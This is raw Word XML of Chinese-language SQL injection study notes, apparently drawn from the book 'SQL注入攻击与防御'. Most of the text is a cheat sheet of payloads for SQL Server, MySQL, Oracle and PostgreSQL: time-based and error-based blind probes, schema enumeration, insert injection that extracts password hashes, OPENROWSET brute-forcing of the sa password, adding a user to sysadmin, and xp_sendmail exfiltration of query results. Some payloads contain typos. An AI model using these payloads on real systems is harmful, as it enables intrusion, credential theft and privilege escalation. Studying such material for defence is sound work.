        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>秒数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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内联</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">：?param=abc’ or 1=dbms_pipe.receive_message(‘RDS’, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>秒数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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PostgreSQL(8.2+)：?param=abc’; select pg_sleep(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>秒数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">);-- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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条件语句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通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> if(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>猜测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">) then </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>特定行为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来猜测服务端信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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语法</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server：if(‘a’=’a’) select 1 else select 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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MySQL：select if(‘a’, 1, 2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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Oracle：select case when ‘a’=’a’ then 1 else 2 end from dual</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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PostgreSQL：select case when(‘a’=’a’) then1 else 2 end</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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基于时延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登录账户是否sa</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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SQL Server：?param=abc’;if+(system_user=’sa’)+waitfor+delay+’0:0:5’--</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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基于错误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登录账户是否sa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是则不影响结果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不是则报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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SQL Server：?id=10/(case+when+(system_user=’sa’)+then+1+else+0+end)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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基于内容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登录账户是否sa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是则不影响结果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不是则返回id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>=11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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SQL Server：?id=10%2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>(case+when+(system_user=’sa’)+then+0+else+1+end)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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将字符串转为数字型进行上述攻击方式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如果登录账户是sa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将查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>?param=acme，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>否则查询</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>?param=acle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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SQL Server：?param=ac’%2Bchar(108%2B(case+when+(system_user=’sa’)+then+1+else+0+end))%2B’e</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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元数据查询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低版本MySQL见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>SQL注入攻击与防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>》P143，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>Oracle连接只能访问连接的那个数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SQL Server：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>select name from master..sysdatabases</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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MySQL(5.0+)：select schema_name from informatin_schema.schemate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>where table_schema not in(’mysql’, ‘information_schema’)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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PostgreSQL：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>select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datname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> from pg_database </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SQL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Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">：select name from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>..sysobjects where xtype=’U’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="2940" w:leftChars="0"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MySQL(5.0+)：select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>_name from informatin_schema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>tables where table_schema=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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PostgreSQL(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>所有库中的所有表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>)：select tablename from pg_tables where tablename not like ‘pg_%’ and tablename not like ’sql_%’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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Oracle：select owner, table_name from all_tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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列</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SQL Server：select name from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">..syscolumns where id=(select id from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>..sysobjects where name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="2940" w:leftChars="0"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MySQL(5.0+)：select </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>_name from informatin_schema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>s where table_schema=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> and table_name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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PostgreSQL(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>模式所有列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>)：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>SELECT relname, A.attname FROM pq_class C, pq_namespace N, pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum&gt;0) AND (NOT A.attisdropped) AND (N.nspname ILIKE 'public')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="2940" w:leftChars="0"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Oracle：select column_name from user_tab_columns where table_name=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="2100" w:leftChars="0"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Insert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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非最后一个参数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将所需信息填入后面构造的参数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截断后续的语句</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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获取第一个数据库用户的账号密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>(2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>进制转</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>进制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SQL Server：insert into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>表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列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">1, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">2) values (‘abc’, (select top 1 name + ‘ | ‘ + master.sys.fn varbintohexstr(password hash) from sys.sql logins)) -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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最后一个参数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用字符串拼接所需信息填入参数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SQL Server：insert into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>表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列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">1, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t xml:space="preserve"> (‘abc’, concat(‘abc’, (select @@verion))) -- </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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通过嵌套sql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使其内层是非结果可见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并刻意使外层报错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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时延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版本符合则延时</w:t>
      </w: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秒</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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INSERT INTO table(column) VALUES ('' || SELECT (SELECT CASE WHEN @@version LIKE '5.1.56%' THEN SLEEP(5) ELSE 'somevalue' END FROM ((SELECT 'value' AS foobar) UNION (SELECT 'value2' AS foobar)) ALIAS) || '')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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正则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条件达成则报错“多于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结果”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不达成则报错“正则相关错误”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SELECT (SELECT 'a' REGEXP (SELECT CASE WHEN &lt;条件&gt; THEN '.*' ELSE '*' END (FROM ((SELECT 'foo1' As bar) UNTON (SElECT 'f002' AS bar) foobar)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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提权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更多信息见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>SQL注入攻击与防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>》P155）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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SQL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Server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通过OPENROWSET暴力猜测密码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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检查这个功能是否可用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可用则返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="2940" w:leftChars="0" w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>select value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>use from sys.configurations where name LIKE 'Ad Hoc%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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暴力尝试sa密码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成功返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>1，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>失败报错</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SELECT * FROM OPENROWSET('S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>LOLEDB', ‘Network=DBMSSOCN;Address=;uid=sa;pwd=foo', ‘select 1’)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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如果服务端开启的是windows模式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那么sa不可用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只有windows用户可登录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暴力window用户会被封锁账户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如果是windows模式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这语句会返回</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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select serverproperty('IsIntegratedSecurityOnly')</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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将自定义用户添加至管理员组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SELECT * FROM OPENROWSET('S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>Q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>LOLEDB', ‘Network=DBMSSOCN;Address=;uid=sa;pwd=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>', ‘select 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>;exec master.dbo.sp_addsrvrolemember ‘’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>’’, ‘’sysadmin’’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>’)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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获取哈希密码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见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>《</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>SQL注入攻击与防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>》P164）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="210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带外通信</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="25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email</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SQL Server 2000：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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EXEC master..xp_startmail;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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EXEC master..xp_sendmail @recipients=’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>接收者邮箱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>’, @query='select @@version'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="336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接收者将会以base</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>格式收到email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也可以以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>attach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>ment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>指定文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="294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SQL Server 2005+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
